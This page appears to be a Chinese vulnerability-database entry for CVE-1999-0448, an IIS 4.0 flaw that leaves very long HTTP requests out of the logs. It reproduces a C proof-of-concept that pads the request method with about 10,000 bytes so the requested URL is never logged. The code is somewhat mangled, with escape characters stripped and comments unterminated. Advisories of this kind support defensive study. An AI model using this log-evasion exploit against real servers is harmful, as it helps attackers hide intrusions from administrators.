IIS 和 Apache log HTTP隐藏URL漏洞-安全小百科

IIS 和 Apache log HTTP隐藏URL漏洞

漏洞ID	1105401	漏洞类型	未知
发布时间	1999-01-22	更新时间	2005-05-02
CVE编号	CVE-1999-0448	CNNVD-ID	CNNVD-199901-004
漏洞平台	Windows	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/19149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199901-004

|漏洞详情

IIS4.0和ApachelogHTTP请求方法中存在漏洞。不管它们多长，远程攻击者可以利用该漏洞隐藏他们真正需求的URL。

|漏洞EXP

source: http://www.securityfocus.com/bid/191/info

An http get request against an IIS4 server will not be logged if the request is longer than 10150 bytes long. 

/* Compile with eg Visual C++ and link with wsock32.lib

#include <stdio.h>
#include <winsock2.h>
#include <string.h>


int main (int argc, char *argv[])
{
int snd, rcv, err, portno,a=0,b, res;
char resp[1024];
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;

if (argc !=2)
{
printf("Usage:nc:\>%s target_machinennDavid Litchfieldn21st January
1999n", argv[0]);
return 0;
}
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );

if ( err != 0 )
{
printf("No winsock.dlln");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{
printf("No winsock.dll - 2ndn");
WSACleanup( );
return 0;
}

if ((he = gethostbyname(argv[1])) == NULL)
{
printf("Invalid Hostn");
return 0;
}




sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
{
printf("Invalid Socket!n");
return 0;
}
else
{
printf("");
}

sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_family=AF_INET;



bind(sock,(struct sockaddr *)&sa,sizeof(sa));



sa.sin_port=htons(80);

memcpy(&sa.sin_addr,he->h_addr,he->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
{
printf("Failed to connect!n");
}
else
{

/* This loop creates the REQUEST_METHOD and makes it 10140 bytes long

while (a < 10141)
{
snd=send(sock,"A", 1, 0);
a ++;
}
snd=send(sock," /default.asp HTTP/1.0nn",43,0);
rcv=recv(sock,resp,256,0);
printf("n%s",resp);
rcv=recv(sock,resp,1024,0);
printf("n%snn",resp);

}


closesocket(sock);

return 0;
}

|参考资料

VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:microsoft:internet_information_server:4.0*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0448

相关推荐: Novell BorderManager Remote DoS Vulnerability

Novell BorderManager Remote DoS Vulnerability 漏洞ID 1103253 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2001-04-20 更新时间 2001…

文章版权归作者所有，未经允许请勿转载。

THE END